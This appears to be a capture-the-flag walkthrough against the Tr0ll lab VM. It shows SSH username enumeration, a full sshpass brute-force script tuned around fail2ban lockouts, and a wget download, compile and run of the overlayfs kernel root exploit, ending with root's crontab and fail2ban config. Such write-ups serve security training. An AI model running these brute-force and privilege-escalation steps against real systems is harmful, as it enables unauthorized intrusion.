--2019-05-19 23:40:48-- http://10.183.0.218/sup3rs3cr3tdirlol/roflmao
Connecting to 10.183.0.218:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7296 (7.1K)
Saving to: 'roflmao'
roflmao 100%[=======================================================================>] 7.12K --.-KB/s in 0s
2019-05-19 23:40:48 (428 MB/s) - 'roflmao' saved [7296/7296]
root@kali:~/Walkthroughs/tr0ll# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
Looks like we have an ELF binary. I'm not really interested in running it on my attacking machine, so I'll try to do some digging into it to see if it might contain any clues. First, I'll run strings on it...
root@kali:~/Walkthroughs/tr0ll# strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.6590
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
roflmao.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
printf@@GLIBC_2.0
_edata
_fini
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
There's only one string that stands out as interesting, "Find address 0x0856BF to proceed"... but what does that mean. I tried to see if that was an address in the binary itself using objdump, but it didn't return anything.
root@kali:~/Walkthroughs/tr0ll# objdump -D roflmao | grep -i 856BF
The hex string doesn't really convert to ASCII. The decimal value of the string is 546495. I checked to see if that might be a directory on the server, but it returned nothing. I decided to see if the hex string "as is" might be another "super secret directory" on the server...
root@kali:~/Walkthroughs/tr0ll# curl http://10.183.0.218/0x0856BF/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /0x0856BF</title>
</head>
<body>
<h1>Index of /0x0856BF</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="good_luck/">good_luck/</a></td><td align="right">2014-08-12 23:59 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="this_folder_contains_the_password/">this_folder_contains_the_password/</a></td><td align="right">2014-08-12 23:58 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.7 (Ubuntu) Server at 10.183.0.218 Port 80</address>
</body></html>
Sure enough! Another directory listing.
Each directory contains a TXT file. In the "good_luck" folder, we have a which_one_lol.txt file. In the "this_folder_contains_the_password" folder, we have a Pass.txt file. Downloading each, we have the following:
root@kali:~/Walkthroughs/tr0ll/10.183.0.218/0x0856BF/good_luck# cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
And...
root@kali:~/Walkthroughs/tr0ll/10.183.0.218/0x0856BF/this_folder_contains_the_password# cat Pass.txt
Good_job_:)
Well, we have a list of words now. There seems to be some indication one of these words is the password. It is also possible one of these words is a username. We've only seen the username "anonymous" used on the FTP service (by us and in the lol.pcap file). The only other service to try to login to is the SSH service. Before doing that, though, we need to figure out some usernames. Maybe we can use one of the "Username Enumeration" scripts in the exploit database.
OpenSSH 2.3 < 7.7 - Username Enumeration | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | exploits/linux/remote/45210.py
OpenSSH < 7.7 - User Enumeration (2) | exploits/linux/remote/45939.py
I'll start with the "newest" exploit (highest number). I'll copy it to my working directory and see what the script parameters are.
root@kali:~/Walkthroughs/tr0ll# cp /usr/share/exploitdb/exploits/linux/remote/45939.py .
root@kali:~/Walkthroughs/tr0ll# python 45939.py
usage: 45939.py [-h] [-p PORT] target username
SSH User Enumeration by Leap Security (@LeapSecurity)
positional arguments:
target IP address of the target system
username Username to check for validity.
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Set port of SSH service
Looks like we just need to pass it a target and username. It doesn't seem to handle a list of usernames, so we'll have to run it in a loop to check multiple. We'll start by checking to see if any of the entries in our wordlists are valid usernames.
root@kali:~/Walkthroughs/tr0ll# for word in $(cat wordlist)
> do
> python 45939.py 10.183.0.218 "$word"
> done
[+] maleus is a valid username
[+] ps-aux is a valid username
[+] felux is a valid username
[+] Eagle11 is a valid username
[+] genphlux is a valid username
[+] usmc8892 is a valid username
[+] blawrg is a valid username
[+] wytshadow is a valid username
[+] vis1t0r is a valid username
[+] overflow is a valid username
[-] Good_job_:) is an invalid username
Looks like all the words in the "which_one_lol.txt" file are valid usernames. I tried to run hydra against the SSH service using our wordlist for both usernames and passwords. Unfortunately, no valid combinations were detected. 😞
hydra -o ssh-crack -t 4 -L wordlist -u -e nsr -P wordlist ssh://10.183.0.218
However, it looks like the SSH service is pretty sensitive to brute force attacks. Using the following script...
for i in $(seq 1 120); do echo $i `python 45939.py 10.183.0.218 test 2>/dev/null`; sleep 1; done
...I was able to determine that the service locks down after 6 failed login attempts and won't let you connect for ~60 seconds.
Instead of hydra, I decided to create a bash script that would use sshpass to try to login to the SSH service. I have several valid usernames to try. Now I need to create a password wordlist. To build the wordlist, I combined both TXT files we downloaded, plus the names of the files, plus some of the other strings we've seen so far. Hopefully something we've come across so far will be a valid password.
root@kali:~/Walkthroughs/tr0ll# cat wordlist
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Good_job_:)
which_one_lol.txt
which_one_lol
Pass.txt
Pass
good_luck
this_folder_contains_the_password
0x0856BF
Find address 0x0856BF to proceed
roflmao
sup3rs3cr3tdirlol
secret
hacker
troll
tr0ll
I also inverted the list of usernames we were given. It is pretty common in these challenges for the "right" thing you need to be at the bottom of the list. I used the "tac" command to reverse the order.
root@kali:~/Walkthroughs/tr0ll# tac usernames > usernames-reverse
root@kali:~/Walkthroughs/tr0ll# cat usernames-reverse
overflow
vis1t0r
wytshadow
blawrg
usmc8892
genphlux
Eagle11
felux
ps-aux
maleus
Here's the script I used to loop through each username and password.
root@kali:~/Walkthroughs/tr0ll# cat ssh-brute.sh
#!/bin/bash
# allow glob matching in case statement
shopt -s extglob
# define colors
RED='\033[0;31m'
GREEN='\033[0;32m'
ORANGE='\033[0;33m'
CYAN='\033[0;36m'
NC='\033[0m'
# perform login attempt and check response
function login_attempt() {
RESPONSE=$(sshpass -p "$2" ssh $1@10.183.0.218 'exit' 2>&1)
case "$RESPONSE" in
*Connection*)
print_warn "Sleeping 10 seconds..."
sleep 10
return 1
;;
*Permission*)
print_fail "$1 : $2"
return 0
;;
*)
print_success "$1 : $2"
print_info "$RESPONSE"
exit
;;
esac
}
# add pretty print functions
function print_info { echo -e "${CYAN}[?]${NC} $1"; }
function print_warn { echo -e "${ORANGE}[*]${NC} $1"; }
function print_fail { echo -e "${RED}[-]${NC} $1"; }
function print_success { echo -e "${GREEN}[+]${NC} $1"; }
# load usernames from list
USERS=($(cat usernames-reverse))
print_info "Loaded ${#USERS[@]} users from wordlist"
# load words from wordlist
WORDS=($(cat wordlist))
print_info "Loaded ${#WORDS[@]} words from wordlist"
# start trying username/password combinations
for username in "${USERS[@]}"; do
for password in "${WORDS[@]}"; do
until login_attempt "$username" "$password"; do : ; done
done
done
Running the script...
root@kali:~/Walkthroughs/tr0ll# ./ssh-brute.sh
[?] Loaded 10 users from wordlist
[?] Loaded 29 words from wordlist
[-] overflow : maleus
[-] overflow : ps-aux
[-] overflow : felux
[-] overflow : Eagle11
[-] overflow : genphlux
[-] overflow : usmc8892
[-] overflow : blawrg
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[-] overflow : wytshadow
[-] overflow : vis1t0r
[-] overflow : overflow
[-] overflow : Good_job_:)
[-] overflow : which_one_lol.txt
[-] overflow : which_one_lol
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[*] Sleeping 10 seconds...
[+] overflow : Pass.txt
[?] Could not chdir to home directory /home/overflow: No such file or directory
Looks like we found a valid username/password combination. 😄 I guess, quite literally, the "this_folder_contains_the_password" folder contained the password... Pass.txt.
Let's try to login with the overflow account.
root@kali:~/Walkthroughs/tr0ll# ssh overflow@10.183.0.218
overflow@10.183.0.218's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
* Documentation: https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon May 20 10:55:11 2019 from kali.homenet.dom
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
Broadcast Message from root@trol
(somewhere) at 11:05 ...
TIMES UP LOL!
Connection to 10.183.0.218 closed by remote host.
Connection to 10.183.0.218 closed.
We're in! Briefly! Looks like we are going to get booted every so often. Doing some testing, the /tmp directory gets cleared and any processes we start are killed as well. This will be fun.
Maintaining Access
N/A
Privilege Escalation
Checking the installed kernel and operating system...
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ cat /etc/os*
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
$ cat /etc/issue*
Ubuntu 14.04.1 LTS \n \l
Ubuntu 14.04.1 LTS
We have a well-known exploit we've had success using in the past.
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
I'll copy the exploit to my working directory and then serve it up to the victim using python's SimpleHTTPServer.
root@kali:~/Walkthroughs/tr0ll# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Walkthroughs/tr0ll# python -m SimpleHTTPServer 4321
Serving HTTP on 0.0.0.0 port 4321 ...
10.183.0.218 - - [20/May/2019 13:23:18] "GET /37292.c HTTP/1.1" 200 -
Then, on the victim...
$ cd /tmp
$ wget -O 37292.c 10.183.0.222:4321/37292.c
--2019-05-20 11:23:19-- http://10.183.0.222:4321/37292.c
Connecting to 10.183.0.222:4321... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[============================================================================================================>] 5,119 --.-K/s in 0s
2019-05-20 11:23:19 (427 MB/s) - '37292.c' saved [5119/5119]
$ gcc -o pwn 37292.c
$ ./pwn
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
Nice! We had to work fast, but we got root... and the proof.txt file.
Pivoting
N/A
Clean Up
We'll let the "cleaner" clean up after us. 😄
Additional Info
Cleaner
Checking in root's crontab, we see the scripts that are running to boot us and clean up after us.
NOTE: The crontab file itself is saved at /var/spool/cron/crontabs/root.
# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/5 * * * * /usr/bin/python /opt/lmao.py
*/2 * * * * /usr/bin/python /lib/log/cleaner.py
The lmao.py file contains the following...
root@troll:/# cat /opt/lmao.py
#!/usr/bin/env python
import os
os.system('echo "TIMES UP LOL!"|wall')
os.system("pkill -u 'overflow'")
sys.exit()
The cleaner.py file contains the following...
root@troll:/# cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Fail2Ban
Fail2Ban was being used to block our SSH attempts after 6 failed logins. Thankfully the default "bantime" was only 60 seconds.
root@troll:~# cat /etc/fail2ban/jail.local
# Fail2Ban configuration file.
#
# This file was composed for Debian systems from the original one
# provided now under /usr/share/doc/fail2ban/examples/jail.conf
# for additional examples.
#
# Comments: use '#' for comment lines and ';' for inline comments
#
# To avoid merges during upgrades DO NOT MODIFY THIS FILE
# and rather provide your changes in /etc/fail2ban/jail.local
#
# The DEFAULT allows a global definition of the options. They can be overridden
# in each jail afterwards.
[DEFAULT]
# "ignoreip" can be an IP address, a CIDR mask or a DNS host. Fail2ban will not
# ban a host which matches an address in this list. Several addresses can be
# defined using space separator.
ignoreip = 127.0.0.1/8
# "bantime" is the number of seconds that a host is banned.
bantime = 60
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 600
maxretry = 3
[...snip...]
[ssh]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 6
[...snip...]